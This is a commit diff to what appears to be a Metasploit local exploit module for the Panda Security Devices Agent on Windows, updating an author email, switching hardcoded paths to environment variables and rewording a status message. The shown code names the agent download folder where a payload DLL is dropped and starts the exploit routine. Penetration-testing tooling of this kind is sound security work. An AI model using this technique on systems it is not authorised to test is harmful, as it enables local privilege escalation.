update email and paths

bug/bundler_fix
h00die 2016-09-28 18:37:48 -04:00
parent 7a108e2102
commit 3b548dc3cd
1 changed files with 4 additions and 4 deletions

View File

@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Local
},
'License' => MSF_LICENSE,
'Author' => [
"h00die <mike@stcyrsecurity.com>", # Module,
"h00die <mike@shorebreaksecurity.com>", # Module,
'Security-Assessment.com' # discovery
],
'Platform' => [ 'win' ],
@ -62,9 +62,9 @@ class MetasploitModule < Msf::Exploit::Local
def get_path()
case sysinfo['OS']
when /Windows (7|8|10|2012|2008)/
return 'C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
when /Windows (NT|XP)/
return 'C:\\Documents and Settings\\All Users\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
end
end
@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Local
end
def exploit
vprint_status(sysinfo['OS'])
vprint_status("OS Detected as: #{sysinfo['OS']}")
payload_filepath = get_path()
payload_filepath = "#{payload_filepath}#{datastore['DLL']}"